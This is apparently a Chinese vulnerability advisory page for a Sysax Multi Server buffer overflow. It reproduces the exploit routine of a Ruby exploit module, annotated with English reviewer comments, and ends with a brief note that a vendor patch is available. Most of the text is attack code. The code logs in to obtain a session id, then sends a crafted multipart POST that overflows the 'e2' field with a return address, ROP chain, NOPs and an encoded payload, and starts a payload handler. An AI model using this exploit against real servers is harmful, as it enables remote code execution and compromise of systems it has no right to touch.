Sysax Multi Server函数缓冲区溢出漏洞(3)

# Module entry point. Two HTTP exchanges are visible here: a login POST that
# yields a session id, followed by a hand-built multipart POST whose "e2"
# form field carries an oversized buffer (random filler, a packed return
# value, optional ROP material, NOPs, then the encoded payload). The title
# describes this as a buffer overflow; the exact faulting routine is not
# shown on this page.
#
# Reads datastore keys: SysaxUSER, SysaxPASS, RHOST.
# Reads target keys:    'Offset', 'Rop', 'Nop', and target.ret.
# Side effects: opens and closes the HTTP connection, starts the payload
# handler, prints status lines.
def exploit
        
        user = datastore['SysaxUSER']
        pass = datastore['SysaxPASS']
        
        # Credentials are joined with a single LF (0x0a) and base64-encoded
        # into the "fd" form parameter the login endpoint expects.
        encodedcreds = Base64.encode64(user+"\x0a"+pass)
        creds = "fd="+encodedcreds

# Opens the connection (provided by the HttpClient mixin; not visible here).
connect

# Login to obtain the SID value. The second argument (20) is presumably the
# read timeout in seconds.
        print_status "Getting SID from #{target_url}"
        res = send_request_raw({
            'method'=> 'POST',
            'uri'   => "#{target_url}/scgi?sid=0&pid=dologin",
            'data'  => creds
        },20)
        
        # Extract the session token: "sid=" followed by exactly 40 alphanumerics.
        # NOTE(review): `res` is used without a nil check, so an absent response
        # raises NoMethodError here rather than a descriptive error.
        sid = res.body.match (/(sid=[A-Z0-9a-z]{40})/)
        print_status "Your " + sid.to_s

# Buffer layout: target['Offset'] bytes of random filler, then target.ret
# packed as a 32-bit little-endian value ('V') — presumably the overwritten
# return address, not verifiable from this excerpt.
buffer = rand_text(target['Offset'])
        buffer << [target.ret].pack('V')

# ROP targets add 16 copies of target['Nop'] followed by the chain built by
# create_rop_chain (defined elsewhere in the module).
if (target['Rop'])
            buffer << [target['Nop']].pack('V')*16
            buffer << create_rop_chain()
        end

# 15 NOP bytes, then the encoded payload (original author's note: max 1299 bytes).
buffer << make_nops(15)
        buffer << payload.encoded #max 1299 bytes
        
        # Hand-built request. Note that post_data begins with the request
        # target and " HTTP/1.1\r\n", i.e. it embeds its own request line and
        # headers; it is later passed through the 'uri' option (see below).
        # The declared "Content-Length: 171" is a fixed value and is smaller
        # than the body actually sent (the boundary and disposition lines
        # alone exceed it); why the server tolerates this is not shown here.
        # The fixed boundary string and the "e2" field name are stable
        # artifacts of this request, useful for detection signatures.
        post_data = "scgi?"+sid.to_s+"&pid=mk_folder2_name1.htm HTTP/1.1\r\n"
        post_data << "Content-Length: 171\r\n\r\n"
        post_data << "-----------------------------1190753071675116720811342231\r\n"
        post_data << "Content-Disposition: form-data; name=\"e2\"\r\n\r\n"
        post_data << buffer+"\r\n"
        post_data << "-----------------------------1190753071675116720811342231--\r\n\r\n"
        
        # Referer points back at the preceding folder-creation page on RHOST.
        referer = "http://"+datastore['RHOST'].to_s+"/scgi?"+sid.to_s+"&pid=mk_folder1_name1.htm"
                
        # The entire raw request (request line, headers, multipart body) is
        # smuggled through the 'uri' key so the client emits it verbatim.
        # Whether the client honours a 'referer' option key is not visible here.
        send_request_raw({
            'uri'     => "/" + post_data,
            'version' => '1.1',
            'method'  => 'POST',
            'referer' => referer
        })

# Start the payload handler, then tear down the connection.
handler
        disconnect

end
end

建议:
--------------------------------------------------------------------------------
厂商补丁:

sysax
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
